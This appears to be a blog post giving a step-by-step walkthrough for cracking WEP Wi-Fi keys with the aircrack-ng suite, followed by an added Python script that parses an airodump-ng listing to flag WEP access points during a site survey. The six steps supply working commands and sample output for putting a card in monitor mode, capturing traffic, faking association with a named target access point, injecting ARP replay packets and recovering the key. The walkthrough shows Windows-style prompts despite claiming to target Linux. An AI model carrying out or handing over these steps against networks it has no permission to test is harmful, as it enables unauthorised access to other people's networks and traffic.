WiFi WEP Encryption Cracking

Wired Equivalent Privacy (WEP) is a security algorithm for IEEE 802.11 wireless networks. Introduced as part of the original 802.11 standard ratified in 1997, its intention was to provide data confidentiality comparable to that of a traditional wired network.

In this post, I will show you how to crack WEP encryption using aircrack-ng on your Linux system.

STEP START

STEP 1 → Use airmon-ng to put the wireless interface into monitor mode

C:\>airmon-ng start eth1

STEP 2 → Start airodump-ng to list the SSIDs visible on the interface, and keep it running

C:\>airodump-ng --ivs --write capture eth1
BSSID              PWR  RXQ  Beacons #Data #/s CH  MB   ENC  CIPHER  ESSID
02:24:2A:BC:89:FE  99   5    61      3     9   1   54e  OPN  WEP     GLOBBE_WIFI
02:24:2A:BC:89:DD  99   9    76      4     0   4   54e  OPN          SMMART_WIREL
00:12:6C:69:5D:CC  99   0    16      1     0   8   54e  WEP  WEP     SOGOOD_HOTEL
1E:33:4F:AE:69:7E  76   70   157     1     0   11  54e  WEP  WEP     HIDDEN_MEEKEY

BSSID              Station            PWR  Rate   Lost  Packets Probes
1E:33:4F:AE:69:7E  00:16:8A:B2:BD:B1  -1   1-0    0     1
1E:33:4F:AE:69:7E  00:1F:4C:CB:B6:BC  76   1e-54  0     6 

STEP 3 → Associate your wireless card (e.g. a6:69:ef:7d:d7:25) with the target access point

C:\>aireplay-ng -1 0 -e HIDDEN_MEEKEY -a 1e:33:4f:ae:69:7e -h a6:69:ef:7d:d7:25 eth1
22:25:10 Waiting for beacon frame (BSSID: 1E:33:4F:AE:69:7E) on channel 11

22:25:10 Sending Authentication Request
22:25:10 Authentication Successful
22:25:10 Sending Association Request
22:25:10 Association successful :-)

STEP 4 → Inject packets using aireplay-ng to generate traffic on the target access point

C:\>aireplay-ng -3 -b 1e:33:4f:ae:69:7e -h a6:69:ef:7d:d7:25 eth1
22:30:15 Waiting for beacon frame (BSSID: 1E:33:4F:AE:69:7E)

Saving ARP requests in replay_arp-0219-123051.cap
You should also start airodump-ng to capture replies
Read 11978 packets (got 7139 ARP requests), sent 3902 packets...

STEP 5 → Wait for airodump-ng to capture more than 50,000 IVs

STEP 6 → Crack the Wired Equivalent Privacy (WEP) key using aircrack-ng

C:\>aircrack-ng -s capture.ivs
Opening capture.ivs

Aircrack-ng 0.7 r130
[00:00:10] Tested 77 keys (got 684002 IVs)

KB  depth  byte(vote)
0   0/ 1   AE(199) 29(27) 2D(13) 7C(12) FE(12) FF(6) 39(5) 2C(3) 00(0) 08(0)
1   0/ 3   66(41) F1(33) 4C(23) 00(19) 9F(19) C7(18) 64(9) 7A(9) 7B(9) F6(9)
2   0/ 2   5C(89) 52(60) E3(22) 10(20) F3(18) 8B(15) 8E(15) 14(13) D2(11) 47(10)
3   0/ 1   FD(375) 81(40) 1D(26) 99(26) D2(23) 33(20) 2C(19) 05(17) 0B(17) 35(17)

KEY FOUND! [AE:66:5C:FD:24]

STEP END
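
The same airodump-ng listing is useful on the defensive side. The following is an added example, not part of the original post: it parses the STEP 2 table to inventory the access points in a site survey that still report WEP, so they can be moved to WPA2 or WPA3. The function names are hypothetical and the cipher list is an assumption about what the CIPHER column can contain.

```python
import re

MAC = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")
CIPHERS = {"WEP", "WEP40", "WEP104", "TKIP", "CCMP"}  # assumed CIPHER values

# Rows copied from the STEP 2 listing on this page (header spelled BSSID).
SAMPLE = """\
BSSID              PWR  RXQ  Beacons #Data #/s CH  MB   ENC  CIPHER  ESSID
02:24:2A:BC:89:FE  99   5    61      3     9   1   54e  OPN  WEP     GLOBBE_WIFI
02:24:2A:BC:89:DD  99   9    76      4     0   4   54e  OPN          SMMART_WIREL
00:12:6C:69:5D:CC  99   0    16      1     0   8   54e  WEP  WEP     SOGOOD_HOTEL
1E:33:4F:AE:69:7E  76   70   157     1     0   11  54e  WEP  WEP     HIDDEN_MEEKEY

BSSID              Station            PWR  Rate   Lost  Packets Probes
1E:33:4F:AE:69:7E  00:16:8A:B2:BD:B1  -1   1-0    0     1
"""

def parse_aps(text):
    """Return one dict per access-point row; headers and station rows are skipped."""
    aps = []
    for line in text.splitlines():
        tok = line.split()
        # AP rows start with a MAC then a numeric PWR; station rows have a second MAC.
        if len(tok) < 10 or not MAC.match(tok[0]) or MAC.match(tok[1]):
            continue
        rest = tok[9:]
        # CIPHER can be blank on open networks, which shifts ESSID one column left.
        cipher = rest.pop(0) if len(rest) > 1 and rest[0] in CIPHERS else ""
        aps.append({"bssid": tok[0].upper(), "channel": int(tok[6]),
                    "enc": tok[8], "cipher": cipher, "essid": " ".join(rest)})
    return aps

def wep_findings(aps):
    """Flag APs whose ENC or CIPHER column reports WEP, noting rows where they disagree."""
    findings = []
    for ap in aps:
        if ap["enc"] != "WEP" and not ap["cipher"].startswith("WEP"):
            continue
        issue = "WEP enabled"
        if ap["enc"] != "WEP":
            issue = f"ENC={ap['enc']} but CIPHER={ap['cipher']}, verify AP config"
        findings.append((ap["bssid"], ap["essid"], ap["channel"], issue))
    return findings

if __name__ == "__main__":
    for bssid, essid, channel, issue in wep_findings(parse_aps(SAMPLE)):
        print(f"{bssid}  ch{channel:<3} {essid:<14} {issue}")
```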

DISCLAIMER: Spydlawr does not promote, encourage, and support any sort of illegal activity. This statement is declaring that the content is for informational or educational purposes only.
